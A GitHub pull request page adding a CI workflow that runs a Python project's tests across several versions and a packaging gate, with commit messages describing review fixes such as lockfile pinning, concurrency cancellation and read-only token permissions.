Skip to content

Ci: Add GitHub Actions workflow for tests + packaging gate 0.0.44#82

Merged
kickthemoon0817 merged 3 commits into
mainfrom
feat/ci-workflow
May 5, 2026
Merged

Ci: Add GitHub Actions workflow for tests + packaging gate 0.0.44#82
kickthemoon0817 merged 3 commits into
mainfrom
feat/ci-workflow

Conversation

@kickthemoon0817
Copy link
Copy Markdown
Owner

@kickthemoon0817 kickthemoon0817 commented May 5, 2026

Summary

Closes the iter15 test-engineer minor finding (no CI workflow runs
the suite or packaging gate). Now meaningful with the post-iter20
100% green baseline.

Changes

  • .github/workflows/ci.yml (new):
    • unit-tests job: matrix across Python 3.11 / 3.12 / 3.13
      (the project's classifier set). Installs via uv pip install --system -e ".[dev]" to match local dev workflow. Runs
      pytest tests/ which the addopts default filters down to
      the fast unit lane (skipping packaging, isaac, unreal_live).
    • packaging-gate job: only runs on main + PRs to main since
      the uv-build-per-test pattern is the slowest job. Overrides
      the addopts default with -m packaging (pytest takes the
      LAST -m).
  • 4-file lockstep bumped to 0.0.44.

Security

The workflow only references trusted inputs
(matrix.python-version, github.ref, github.event_name)
and never interpolates user-controlled fields (issue title, PR
body, commit messages, head ref) into run: blocks. The
risky-input avoidance is documented inline at the top of the file.

How to Test

The PR push itself is the test — both jobs should appear under
"Checks" and run green.

Checklist

Testing

  • Local YAML validation passes.
  • Local pytest tests/ baseline confirmed (495 passed,
    0 failed, 6 skipped, 3 deselected).
  • Local pytest tests/packaging/ -m packaging baseline
    confirmed (3 passed in ~1.2s).
  • CI workflow run will be the live verification.

Compatibility

  • No source-code changes outside the new workflow file +
    4-file version bump.
  • No effect on local development workflows; the workflow
    only runs in GitHub Actions.

Documentation

  • Workflow comments document what each job does, why the
    packaging gate is conditional, and the security posture.

@kickthemoon0817
ci: add GitHub Actions workflow gating tests + packaging on push
1a881a4 
Closes the iter15 test-engineer minor finding (no CI workflow runs
the suite or the packaging gate). Now meaningful with the
post-iter20 100% green baseline.

Two jobs:

- unit-tests: matrix across Python 3.11 / 3.12 / 3.13 (the
  project's classifier set). Installs via uv to match local dev
  workflow. Runs 'pytest tests/' which the addopts default
  filters down to the fast unit lane (skipping packaging,
  isaac, unreal_live markers).
- packaging-gate: only runs on main + PRs to main since the
  uv-build-per-test pattern is the slowest job. Overrides the
  addopts default by passing '-m packaging' last (pytest takes
  the LAST -m).

Security: the workflow only references trusted inputs
(matrix.python-version, github.ref, github.event_name) and never
interpolates user-controlled fields (issue title, PR body, commit
messages, head ref) into run: blocks. The risky-input avoidance
is documented inline at the top of the file.
@kickthemoon0817
chore: bump version to 0.0.44, 4-file lockstep
204980c
@kickthemoon0817
fix: tighten CI workflow from review feedback
3682ab1 
Code-reviewer found a HIGH (lockfile bypass) + 2 MEDIUM (double-runs,
missing permissions) on the iter22 CI workflow:

- HIGH: 'uv pip install --system -e .[dev]' bypasses the tracked
  uv.lock entirely, so CI resolves transitive deps fresh from PyPI
  on every run. A transitive-dep break would silently flip CI red
  unrelated to the PR. Switched to 'uv sync --extra dev' which
  reads uv.lock and pins all transitive versions to what local dev
  resolves. Test runs now use 'uv run pytest' to invoke pytest
  inside the synced project venv. Both jobs (unit-tests +
  packaging-gate) updated.
- MEDIUM: a contributor pushing to a feature branch with an open
  PR triggered both push + pull_request events, doubling the matrix
  run. Added a 'concurrency' group keyed on workflow + ref with
  'cancel-in-progress: true' — the stale push run is canceled the
  moment the PR event fires for the same ref.
- MEDIUM: GITHUB_TOKEN inherited the repo's default permissions
  (often write). Added top-level 'permissions: contents: read'
  since this is a read-only test workflow with no deployments,
  releases, or comments.

Plus 1 LOW addressed inline:

- Added a one-sentence note to the packaging-gate comment that a
  packaging-breaking change pushed to a feature branch without a
  PR will not be caught until the PR is created (the 'main + PRs'
  conditional intentionally trades that case for slowest-job
  cost).
- Removed the misleading 'CLAUDE.md tracks the canonical count'
  parenthetical — the count drifts as tests are added; pytest's
  own output is the canonical reference.

Two LOW items deferred to iter23+:

- SHA-pinning of action versions (actions/checkout@v4 etc) — best
  practice for public repos but over-engineering for v0.0.x.
- Lint/type-check job (black/isort/flake8/mypy) — bigger scope
  improvement worth its own PR.
@kickthemoon0817 kickthemoon0817 merged commit 53a398d into main May 5, 2026
8 checks passed
@kickthemoon0817 kickthemoon0817 deleted the feat/ci-workflow branch May 5, 2026 10:22
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

No reviews

Assignees

No one assigned

Labels

None yet

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

1 participant

@kickthemoon0817